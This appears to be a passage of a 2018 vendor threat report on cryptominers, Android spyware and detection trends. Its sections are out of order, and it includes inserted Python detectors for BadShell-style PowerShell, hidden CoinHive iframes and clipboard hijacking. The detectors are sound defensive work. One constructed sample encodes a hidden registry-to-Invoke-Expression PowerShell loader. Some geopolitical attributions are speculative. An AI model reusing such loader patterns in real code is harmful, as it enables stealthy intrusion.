The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, change the search provider and/or perform other actions the user did not intend. Software of this kind includes free toolbars, adware and "system optimizers".

As the bubble chart shows, the US was far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; examples include fake anti-virus products and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software used to "crack" or patch unregistered copies of Microsoft software. Programs of this kind are referred to as "hacktools" and are often distributed together with additional malware that users install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical Analysis

In this section we examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. The diagram also lists the #1 malware family for each vertical's top malware type.

Let us take a closer look at two trojans, Kryptik and Zbot, which were the top detections not in one but in multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017. Note that "Kryptik" is also used by several vendors as a generic detection name for heavily obfuscated trojans of many different origins, so its prevalence across verticals partly reflects the breadth of that label rather than a single campaign.

Second, "Zbot", another name for the "Zeus" trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Zeus-derived botnets remain among the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that the target's computer already has a virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Strategic analysis like this can be used to create a malware profile for each vertical, providing cyber intelligence that clarifies the primary threats and focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. The major spike on March 13 clearly stands out. What happened on that day in the US, and what might explain the surge in malware activity? On that day US President Donald Trump announced his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies around the world suddenly received a raft of new collection requirements covering upcoming changes in US political, military and intelligence activities, and immediately began to fulfill them through computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. June 4 clearly stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo trojan detections in South Korea during Q2 2018. The highest spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, and spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo researched the detected malware further and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that nearly all activities, from social life to business, politics and national security affairs, are now performed online. This is especially true during times of national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. This timeline provides ample evidence: Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". This timeline of Comodo's Virus and Trojan detections in Belarus in Q2 2018 offers evidence for that argument. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was used specifically to disseminate trojans, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both may be associated with recent electoral events. In mid-April Iraq was preparing for a national election, which included the conundrum of how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, the highest spike, on May 24, may have had more than one cause. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.

7.9 Croatia

Since the cyberattacks that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, the massive spike in malware detections in Croatia on March 28 is interesting: it came a mere day after the Russian government called the Croatian government's decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

7.10 Finland, Russia, USA

Finally, consider Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this Virus activity in Finland showed that it took place almost exclusively in Helsinki's suburb of Vantaa, where at the time the summit was expected to take place.

8 Conclusions

In Q2 Comodo Cybersecurity observed several significant new trends that are likely to influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but also presage possible future cybersecurity scenarios.

The rise of trojan malware in the last quarter suggests that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with their real impact being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a large surge in host infections worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to run attacks are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, which presages new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful compromise, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: cybercriminals are increasingly biased toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process of setting up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 All Rights Reserved. Comodo Security Solutions, Inc. Visit comodo.com.

NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, Tel: +1 (888) 266 6361, Int: +1 (703) 581 6361, Fax: +1 (973) 777 4394, sales@comodo.com

EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800, www.comodo.co.in

About Comodo Cybersecurity

Comodo Threat Research Labs (CTRL) monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With five offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine-learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack

2.4 The growth of Flawed Ammyy attacks for Q2

The growth of Flawed Ammyy attacks for Q2

2.5 Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became the 800-pound gorilla of the malware market in Q2. This trend will inevitably shift attack vectors toward covert theft and the manipulation of users. It is a real gift for cybercriminals and a nightmare for users.

Trojans let attackers gain time. Because the malware acts covertly, cybercriminals have more than enough time to use stolen data to their advantage. In many cases an attack is discovered only when it is too late: after money has been withdrawn from a bank account, confidential data has been published, and so on. The pairing of trojans as payloads with phishing emails as the delivery mechanism, observed throughout Q2, will result in a huge surge in such attacks and victims. And the use of legitimate tools like PowerShell to run malware will amplify the number of victims even more, because such attacks are much harder for antivirus products to detect.

To fight these attacks, security teams need to realign their defenses with the trends described above. Combining the best malware-detection tools with data-protection measures built on defense-in-depth principles offers the most promising solution.

[Chart for 2.4: Flawed Ammyy detections per month in Q2 2018. April: 43,188; May: 46,382; June: 48,881]

3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean their impact has greatly diminished. On the contrary, current cryptominer behavior recalls an army preparing for battle: training and re-provisioning to fight more efficiently. Cryptominers are developing quickly and gaining dangerous new abilities.

Earlier cryptominers could only use an infected machine's resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: unlike other malware, a cryptominer would not steal information or destroy data, merely consume CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and removed.

But the events of Q2 clearly showed that the situation has radically changed.

New cryptominer samples detected by Comodo malware analysts exhibit far more harmful abilities than mining alone requires. These samples show that cryptominers are turning into a sophisticated, multifunctional weapon for cybercriminals. They are learning to hide from and fight against anti-malware tools. They can camouflage themselves, kill competing cryptominers, and even crash the victim's system when an attempt is made to remove them.

3.1 BadShell attacks enterprises

Fileless malware is next-generation malware compared with traditional infection via .exe files. File-based malware resides on the hard drive, which makes it easier to detect. Fileless malware is different: as its name suggests, it is malicious code injected into legitimate OS processes. It need not be installed on the victim machine as a file but runs only in memory, making it much harder for antivirus products to detect.

Such malware is usually spread via malicious ad banners. Clicking on a banner redirects the user to an infected website, from which the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware that they are infected. Not surprisingly, its use by cybercriminals is on the increase.

Last quarter Comodo Threat Research Labs analysts faced exactly such an attack. A company with several thousand endpoints was compromised by fileless malware. When its legacy security software failed to protect it, the company turned to Comodo Threat Research Labs for assistance.

Comodo analysts found that the malware was a cryptominer that used only legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence, and the Registry to hold the malicious binary code. The screenshots below show exactly how the malware, dubbed BadShell, works. Note that "fileless" is relative: the scheduled task and the registry value holding the encoded payload are durable artifacts on disk, and they are where a responder should hunt for this infection.

Decoding the PowerShell arguments reveals the malicious code stored in the registry. The PowerShell script injects this code into an existing running process.
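As an added example (not code from the report or from Comodo), the following Python script performs the decoding step described above and turns it into a check: it extracts a PowerShell -EncodedCommand argument, which is base64 over UTF-16LE rather than UTF-8, and scores the command line against the behaviors BadShell relies on (hidden window, registry read, base64 decode, Invoke-Expression, process injection). The sample command lines, the registry path HKCU:\Software\Classes\Example and the value name Data are constructed placeholders, not indicators from the report. The same function can be run over the action of every scheduled task (schtasks /Query /XML) and over PowerShell process-creation events.

```python
import base64
import re
from typing import Dict, List, Optional

# -EncodedCommand and its unambiguous prefixes (-e, -ec, -enc) followed by a base64 blob,
# as they appear in scheduled-task actions and process command lines.
ENC_RE = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# Behavioral indicators. Tune against your environment's baseline before alerting.
INDICATORS: Dict[str, re.Pattern] = {
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "no_profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
    "registry_read": re.compile(r"(?i)\b(?:Get-ItemProperty|Get-Item|gp)\b[^;]*\bHK(?:CU|LM):"),
    "base64_decode": re.compile(r"(?i)FromBase64String"),
    "dynamic_eval": re.compile(r"(?i)\b(?:IEX|Invoke-Expression)\b"),
    "process_injection": re.compile(
        r"(?i)\b(?:VirtualAllocEx|WriteProcessMemory|CreateRemoteThread|OpenProcess)\b"),
    "reflective_load": re.compile(r"(?i)\[(?:System\.)?Reflection\.Assembly\]::Load"),
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if the line has none.
    PowerShell expects base64 over UTF-16LE, so decoding as UTF-8 would fail or garble."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_cmdline(cmdline: str) -> Dict[str, object]:
    """Decode the command line (if encoded) and score the visible plus decoded text."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + "\n" + (decoded or "")
    hits: List[str] = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"decoded": decoded, "indicators": hits, "suspicious": len(hits) >= 3}


# Constructed samples (not from the report). The registry path and value name are
# placeholders; the structure mirrors the behavior described in the text: read a blob
# from the registry, base64-decode it and hand the result to Invoke-Expression.
BADSHELL_LIKE_SCRIPT = (
    "$b=(Get-ItemProperty -Path 'HKCU:\\Software\\Classes\\Example' -Name Data).Data;"
    "$code=[Convert]::FromBase64String($b);"
    "IEX ([Text.Encoding]::Unicode.GetString($code))"
)
BADSHELL_LIKE_CMDLINE = "powershell.exe -NoP -W Hidden -Enc " + base64.b64encode(
    BADSHELL_LIKE_SCRIPT.encode("utf-16le")).decode("ascii")
BENIGN_CMDLINE = 'powershell.exe -NoProfile -Command "Get-Date"'


def run_samples() -> Dict[str, Dict[str, object]]:
    """Score both constructed command lines; the benign one must not trip the threshold."""
    return {"benign": analyze_cmdline(BENIGN_CMDLINE),
            "badshell_like": analyze_cmdline(BADSHELL_LIKE_CMDLINE)}


if __name__ == "__main__":
    for label, result in run_samples().items():
        print(label, result["suspicious"], result["indicators"])
```

The threshold of three indicators is deliberately loose: a single -NoProfile or hidden window is routine in administrative scripts, but a hidden, encoded PowerShell that reads a registry blob and evaluates it is exactly the BadShell shape and warrants a look at the task that launched it.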

BadShell at work

The malicious code in the registry

This emergency clearly demonstrates how dangerous cryptominer activity can be. Imagine: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to do their jobs. Comodo analysts took over and cleaned the infection from all affected computers, but the company's financial losses were, of course, irreversible.

Evading antivirus and persisting in the system are the most important attributes of a cryptominer, because the longer it runs on an infected system the more it earns for the attackers. That is why cybercriminals pay special attention to a cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into the attacker's slave.

3.2 WinstarNssmMiner: a system killer

Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency for cybercriminals. But it has a special feature: it roots itself into the system so deeply that it becomes effectively unremovable. Attempting to kill it crashes the target system.

The secret of WinstarNssmMiner's persistence lies in the way it infects the victim's computer. It consists of two components, each injected into a system svchost.exe process. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially notable is that both infected svchost.exe processes have the "critical process" attribute set, meaning that terminating either of them crashes the system and leaves the user with a blue screen. This is the same flag Windows sets on its own essential processes; it can be read and cleared through the ProcessBreakOnTermination process-information class, so a responder should clear the flag on the injected processes before terminating them rather than killing them outright.

WinstarNssmMiner spreading around the world

Cryptominers can kill not only their victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out from other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.

CoinMiner kills its rivals as follows.

The code below downloads the CoinMiner build for the Windows architecture (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.

The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, of the process names it is instructed to kill. The lists include other kinds of cryptominer.

In this way CoinMiner has the victim's computer to itself and uses all of its resources for mining cryptocurrency.

Some cryptominers have earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide; CoinHive is the clearest example.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer: if you put its snippet into a web page, every visitor to the site mines coins for you.

As you can see, the CoinHive script is easily spotted in the page source.

The CoinHive script

After many publications on the subject in the mass media and in cybersecurity reports, users started checking website source code for cryptominers. But in the second quarter perpetrators found a way around this obstacle: they now camouflage the CoinHive loader behind a URL shortener (cnhv.co is the shortlink service operated by CoinHive itself).

As a result, the malicious code on a web page looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we find an iframe:

The iframe loads the URL shortener

Notice that the width and height of the iframe are set to 1 to make it as close to invisible as possible.

Now let's look at the URL https://cnhv.co:

And there we find the familiar link to CoinHive:

The link to CoinHive
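To turn the decoding step shown above into a repeatable check, here is an added Python example (not code from the report or from CoinHive) that peels unescape() and atob() obfuscation layers from page source, lists iframes that are sized 1x1 or styled invisible, and flags those whose src points at cnhv.co. The sample page, the /example path and the host list are constructed for the demonstration; extend the host set with your own findings. JavaScript's %uXXXX escapes and string-splitting tricks are not handled here.

```python
import base64
import html
import re
from typing import Dict, List
from urllib.parse import unquote, urlparse

# Obfuscation layers commonly used to hide an injected iframe. Real pages nest them,
# so deobfuscate() keeps peeling until a pass changes nothing.
UNESCAPE_RE = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
ATOB_RE = re.compile(r"""atob\(\s*(['"])([A-Za-z0-9+/=\s]*?)\1\s*\)""", re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([A-Za-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

# cnhv.co is the shortlink service CoinHive ran. Assumed list; add hosts from your own hunts.
MINER_SHORTLINK_HOSTS = {"cnhv.co"}


def _atob(blob: str) -> str:
    """Mimic JavaScript atob(): base64 to a byte string (decoded as Latin-1 here)."""
    blob = re.sub(r"\s+", "", blob)
    blob += "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(blob).decode("latin-1")
    except ValueError:
        return ""


def deobfuscate(text: str, max_rounds: int = 5) -> str:
    """Replace unescape('%3C...') and atob('...') calls with their decoded contents."""
    for _ in range(max_rounds):
        new = UNESCAPE_RE.sub(lambda m: unquote(m.group(2)), text)
        new = ATOB_RE.sub(lambda m: _atob(m.group(2)), new)
        if new == text:
            break
        text = new
    return text


def parse_attrs(raw: str) -> Dict[str, str]:
    """Attribute string of one tag -> {name: value}, accepting ", ' or bare values."""
    return {name.lower(): html.unescape(v1 or v2 or v3 or "")
            for name, v1, v2, v3 in ATTR_RE.findall(raw)}


def is_hidden(attrs: Dict[str, str]) -> bool:
    """A 1x1 (or 0x0) frame, or one styled away, is invisible to the visitor."""
    def px(value: str) -> int:
        m = re.match(r"\s*(\d+)", value or "")
        return int(m.group(1)) if m else -1
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (0 <= px(attrs.get("width", "")) <= 1 or 0 <= px(attrs.get("height", "")) <= 1
            or "display:none" in style or "visibility:hidden" in style)


def find_hidden_iframes(page: str) -> List[Dict[str, object]]:
    """Deobfuscate the page, then report every hidden iframe with its target host."""
    decoded = deobfuscate(page)
    findings: List[Dict[str, object]] = []
    for m in IFRAME_RE.finditer(decoded):
        attrs = parse_attrs(m.group(1))
        if not is_hidden(attrs):
            continue
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        findings.append({"src": src, "host": host,
                         "miner_shortlink": host in MINER_SHORTLINK_HOSTS})
    return findings


# Constructed page (not from the report): document.write(unescape(...)) injects a 1x1 iframe
# pointing at cnhv.co; the /example path is a placeholder. The visible video embed is there
# to show that ordinary iframes are not reported.
SAMPLE_PAGE = """<html><body><h1>Welcome</h1>
<script>document.write(unescape('%3Ciframe%20src%3D%22https%3A%2F%2Fcnhv.co%2Fexample%22%20width%3D%221%22%20height%3D%221%22%3E%3C%2Fiframe%3E'));</script>
<iframe src="https://www.youtube.com/embed/example" width="560" height="315"></iframe>
</body></html>"""

if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_PAGE):
        print(hit)
```

Checking the decoded source rather than the raw HTML is the point: the user in the scenario below searches the page as served and finds nothing, while a scanner that first unwinds the encoding sees the 1x1 frame and the shortener host immediately.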

What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the page source but finds no sign of a cryptominer. So she concludes that something is wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.

The next malware in our list prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead steals cryptocurrency outright, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and digits, so it is almost impossible to remember or type in by hand. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals treat this copy-paste step as a gap they can exploit.

The cryptocurrency clipboard hijacker watches the clipboard for a copied wallet address. On finding one, it swaps it for the address of a wallet under the attacker's control, so the unwitting owner of the infected machine delivers cryptocoins straight into the cybercriminals' hands.

A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed bundled with All-Radio 4.27 Portable. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The trojanized version of All-Radio 4.27 was used to spread several kinds of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack.

The user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
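The detection a practitioner would want here is behavioral: a hijacker substitutes a syntactically valid address of the same family, so format checks alone cannot catch it; only a mismatch against what the user actually copied can. The following Python example (added here, not code from the report or from the malware) implements that check over a constructed event stream that reuses the two addresses quoted above. The event format and the address patterns are assumptions of this example; in a real guard the "copy" events would come from a clipboard hook in the user's own copy action and the "poll" events from periodic clipboard reads.

```python
import re
from typing import Dict, List, Optional, Sequence, Tuple

# Address families the guard recognises (assumed set; extend for other coins).
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"[13][a-km-zA-HJ-NP-Z1-9]{25,34}"),
    "btc_bech32": re.compile(r"bc1[ac-hj-np-z02-9]{11,71}"),
    "eth": re.compile(r"0x[0-9a-fA-F]{40}"),
}


def classify_address(text: str) -> Optional[str]:
    """Return the address family of the whole clipboard string, or None if it is not one."""
    text = text.strip()
    for kind, rx in ADDRESS_PATTERNS.items():
        if rx.fullmatch(text):
            return kind
    return None


# ("copy", text): the user's own copy action put text on the clipboard.
# ("poll", text): a later observation of the clipboard contents.
Event = Tuple[str, str]


def detect_clipboard_swaps(events: Sequence[Event]) -> List[Dict[str, object]]:
    """Flag every poll in which an address the user copied has been replaced by a different,
    well-formed address without a new copy action in between. Plain text and unchanged
    clipboards produce no alert, which keeps the guard quiet during normal work."""
    expected: Optional[str] = None
    alerts: List[Dict[str, object]] = []
    for index, (kind, text) in enumerate(events):
        value = text.strip()
        if kind == "copy":
            expected = value
            continue
        if kind != "poll" or expected is None:
            continue
        if classify_address(expected) and value != expected and classify_address(value):
            alerts.append({"event": index, "expected": expected, "seen": value,
                           "family": classify_address(value)})
    return alerts


# Constructed event stream using the two addresses quoted in the report: the user copies
# the intended destination, the clipboard is unchanged at the first poll, then a hijacker
# swaps it for its own address.
SAMPLE_EVENTS: List[Event] = [
    ("copy", "meeting at 10"),
    ("poll", "meeting at 10"),
    ("copy", "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),
    ("poll", "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),
    ("poll", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),
]

if __name__ == "__main__":
    for alert in detect_clipboard_swaps(SAMPLE_EVENTS):
        print(alert)
```

On an alert the sensible response is to restore the expected value to the clipboard and warn the user before the paste reaches a wallet application; with a list of 2,343,286 attacker addresses there is no practical blocklist, so the comparison against the user's own copy is the only reliable signal.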

An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in number, they are coming back in updated disguises and promise to become a serious new challenge for security teams and vendors.

4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers: every smartphone holds a wealth of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the contents of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, cybercriminals are not the only ones hunting for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking their partners' every move and parents wanting to control their children, and you can easily understand why Android-oriented malware is a growing business.

Today spying is the number-one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks in the graph.

The digital spooks

Like real-world spies, digital agents impersonate legitimate entities, posing as innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions:

Version 1: Naver Defender

Version 2: Netease Defender

Version 3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals the owner's account details, contacts, ID, name, phone numbers and email address. It grabs SMS messages and their associated metadata. It attempts to read call logs (number, name, type, duration), emails (email type) and contacts' photos. After extracting all the data, the malware encrypts it with AES and sends it to the attackers' server, httphttpcgalimcomadminhrpupuphpdo=upload

KevDroid records the victim's every phone call, then encrypts and uploads the recording to the cybercriminals' server. In addition it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.

Version 3 of KevDroid takes photos, records calls and creates a list of the files on the device. It also extracts the web history, account and contact details, and device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via the official Google Play store. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly tracked all events on the infected device. Social networks were another means of dissemination.

Version-1 Dardesh Google Play Services Instant Apps

Version-2 Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the smartphone's location. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim's device. It is included in some spyware tools, like FinSpy and Pegasus.

4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has four different versions:

Version-1 Telegram Groups انتخاب دھم

Version-2 Postrall Yes For Referendum انتخاب دھم

Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机

Version-4 VPN Easy DroFirewall m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version etc.), call-log details and external-storage content.

The third version is included in spyware named "Spymaster Pro" and can:

Enable and disable the GPS services

Record audio and send it to the Command & Control server

Upload image files

Collect information about installed applications

Collect browser data

Send SMS and read outgoing SMS

